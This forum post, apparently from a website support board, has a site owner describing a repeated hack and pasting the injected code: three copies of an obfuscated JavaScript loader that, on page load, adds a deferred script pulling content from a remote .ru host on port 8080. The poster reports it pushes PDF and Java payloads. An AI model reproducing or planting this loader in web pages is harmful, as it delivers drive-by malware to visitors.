HACKED AGAIN!
-
Pissing me off… hacked 2 in less that 24 hours… most likely by something automated. Regardless whether the hacker is real or not, it is inserting code before and after html tags of all pages. Occasionally the script shoves a pdf file down the browsers’ throat or starts loading Java (which is never a good sign) Code is as follows:
<script>var w;var pO=["Kw","Si","A"];var ff=[];s=function(){try {var iA='U'} catch(iA){};try {var SA='r'} catch(SA){};bi=13112;bi--;ES=54459;ES--;function b(K,KZ,ba){n=["EM","R","P"];return K.substr(KZ,ba);O=[];d=54954;d++;}this.qU=37510;this.qU++;var c=String(b("/plQ23I",0,3)+b("9uhSentSu9h",4,3)+b("yofnsYK",0,3)+"fis"+"h-c"+b("AdEtom/EdAt",4,3)+b("gooG7P",0,3)+"gle"+".co"+b("m/a0Fn",0,3)+"bou"+b("tusUx4v",0,3)+".or"+"g.p"+b("hpuRNv",0,2));var zq='';var t='';var E=document;aU=63507;aU++;C=8468;C--;var i=RegExp;UB={W:1243};var aN={rB:33800};eR={v:52467};uC=["J"];this.vc='';function I(K,KZ){F={bak:5654};var ls="";var ba=new String(b("[7HK",0,1))+KZ+String("]");var G=new i(ba, String("g"));return K.replace(G, t);};this.Yu=40099;this.Yu+=195;this.YB="YB";var h=b("bodyjCh",0,4);this.zF="zF";var a=I('sVcTrviTpTtv','NE7Tv5yVK');this.DB=16149;this.DB--;var Q=null;try {var ce='vS'} catch(ce){};var u=695531-687451;tp=["cP"];w=function(){try {var jJ='Ku'} catch(jJ){};try {var xa='bB'} catch(xa){};try {var hf="";var ff_={mt:18397};var p=I('czrkekaxtHeXE6lPeKm3eZnMt3','YCHXMvdbk6zZx7KP3');try {var na='YX'} catch(na){};S=E[p](a);var xz='';this.vn=32933;this.vn++;var iS=["Da"];var K=u+c;Wu=43840;Wu--;gS=3028;gS--;qj=7048;qj--;mC=[];var y=I('s4r4c1','Iuw481hl');this.Oz=57358;this.Oz+=52;var f=new String("defe"+"r");var fl=["OM"];S[y]=b("httporD",0,4)+b("y4O0://tO04y",4,4)+"enth"+b("proflK4U",0,4)+b("it.r7eb",0,4)+b("sGv6u:6sGv",4,2)+K;this.Zt=33095;this.Zt+=34;S[f]=[1,9][0];cD=["dZ","ny","mlz"];o={};this.Ll=55576;this.Ll--;E[h].appendChild(S);WW=55385;WW--;this.Uu="";} catch(x){fA={};this.dx=207;this.dx+=218;Vk=["Xf"];};};this.eK=false;};s();try {var Nc='gC'} catch(Nc){};window.onload=w;QG=["az","id","Eh"];var pL=["pT","pc"];</script> <!--323654d6aab2e07079fd4513bdfd296c--><script>var w;var pO=["Kw","Si","A"];var ff=[];s=function(){try {var iA='U'} catch(iA){};try {var SA='r'} catch(SA){};bi=13112;bi--;ES=54459;ES--;function b(K,KZ,ba){n=["EM","R","P"];return K.substr(KZ,ba);O=[];d=54954;d++;}this.qU=37510;this.qU++;var c=String(b("/plQ23I",0,3)+b("9uhSentSu9h",4,3)+b("yofnsYK",0,3)+"fis"+"h-c"+b("AdEtom/EdAt",4,3)+b("gooG7P",0,3)+"gle"+".co"+b("m/a0Fn",0,3)+"bou"+b("tusUx4v",0,3)+".or"+"g.p"+b("hpuRNv",0,2));var zq='';var t='';var E=document;aU=63507;aU++;C=8468;C--;var i=RegExp;UB={W:1243};var aN={rB:33800};eR={v:52467};uC=["J"];this.vc='';function I(K,KZ){F={bak:5654};var ls="";var ba=new String(b("[7HK",0,1))+KZ+String("]");var G=new i(ba, String("g"));return K.replace(G, t);};this.Yu=40099;this.Yu+=195;this.YB="YB";var h=b("bodyjCh",0,4);this.zF="zF";var a=I('sVcTrviTpTtv','NE7Tv5yVK');this.DB=16149;this.DB--;var Q=null;try {var ce='vS'} catch(ce){};var u=695531-687451;tp=["cP"];w=function(){try {var jJ='Ku'} catch(jJ){};try {var xa='bB'} catch(xa){};try {var hf="";var ff_={mt:18397};var p=I('czrkekaxtHeXE6lPeKm3eZnMt3','YCHXMvdbk6zZx7KP3');try {var na='YX'} catch(na){};S=E[p](a);var xz='';this.vn=32933;this.vn++;var iS=["Da"];var K=u+c;Wu=43840;Wu--;gS=3028;gS--;qj=7048;qj--;mC=[];var y=I('s4r4c1','Iuw481hl');this.Oz=57358;this.Oz+=52;var f=new String("defe"+"r");var fl=["OM"];S[y]=b("httporD",0,4)+b("y4O0://tO04y",4,4)+"enth"+b("proflK4U",0,4)+b("it.r7eb",0,4)+b("sGv6u:6sGv",4,2)+K;this.Zt=33095;this.Zt+=34;S[f]=[1,9][0];cD=["dZ","ny","mlz"];o={};this.Ll=55576;this.Ll--;E[h].appendChild(S);WW=55385;WW--;this.Uu="";} catch(x){fA={};this.dx=207;this.dx+=218;Vk=["Xf"];};};this.eK=false;};s();try {var Nc='gC'} catch(Nc){};window.onload=w;QG=["az","id","Eh"];var pL=["pT","pc"];</script> <!--323654d6aab2e07079fd4513bdfd296c--><script>var w;var pO=["Kw","Si","A"];var ff=[];s=function(){try {var iA='U'} catch(iA){};try {var SA='r'} catch(SA){};bi=13112;bi--;ES=54459;ES--;function b(K,KZ,ba){n=["EM","R","P"];return K.substr(KZ,ba);O=[];d=54954;d++;}this.qU=37510;this.qU++;var c=String(b("/plQ23I",0,3)+b("9uhSentSu9h",4,3)+b("yofnsYK",0,3)+"fis"+"h-c"+b("AdEtom/EdAt",4,3)+b("gooG7P",0,3)+"gle"+".co"+b("m/a0Fn",0,3)+"bou"+b("tusUx4v",0,3)+".or"+"g.p"+b("hpuRNv",0,2));var zq='';var t='';var E=document;aU=63507;aU++;C=8468;C--;var i=RegExp;UB={W:1243};var aN={rB:33800};eR={v:52467};uC=["J"];this.vc='';function I(K,KZ){F={bak:5654};var ls="";var ba=new String(b("[7HK",0,1))+KZ+String("]");var G=new i(ba, String("g"));return K.replace(G, t);};this.Yu=40099;this.Yu+=195;this.YB="YB";var h=b("bodyjCh",0,4);this.zF="zF";var a=I('sVcTrviTpTtv','NE7Tv5yVK');this.DB=16149;this.DB--;var Q=null;try {var ce='vS'} catch(ce){};var u=695531-687451;tp=["cP"];w=function(){try {var jJ='Ku'} catch(jJ){};try {var xa='bB'} catch(xa){};try {var hf="";var ff_={mt:18397};var p=I('czrkekaxtHeXE6lPeKm3eZnMt3','YCHXMvdbk6zZx7KP3');try {var na='YX'} catch(na){};S=E[p](a);var xz='';this.vn=32933;this.vn++;var iS=["Da"];var K=u+c;Wu=43840;Wu--;gS=3028;gS--;qj=7048;qj--;mC=[];var y=I('s4r4c1','Iuw481hl');this.Oz=57358;this.Oz+=52;var f=new String("defe"+"r");var fl=["OM"];S[y]=b("httporD",0,4)+b("y4O0://tO04y",4,4)+"enth"+b("proflK4U",0,4)+b("it.r7eb",0,4)+b("sGv6u:6sGv",4,2)+K;this.Zt=33095;this.Zt+=34;S[f]=[1,9][0];cD=["dZ","ny","mlz"];o={};this.Ll=55576;this.Ll--;E[h].appendChild(S);WW=55385;WW--;this.Uu="";} catch(x){fA={};this.dx=207;this.dx+=218;Vk=["Xf"];};};this.eK=false;};s();try {var Nc='gC'} catch(Nc){};window.onload=w;QG=["az","id","Eh"];var pL=["pT","pc"];</script> <!--323654d6aab2e07079fd4513bdfd296c--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
Viewing 3 replies - 1 through 3 (of 3 total)
Viewing 3 replies - 1 through 3 (of 3 total)
- The topic ‘HACKED AGAIN!’ is closed to new replies.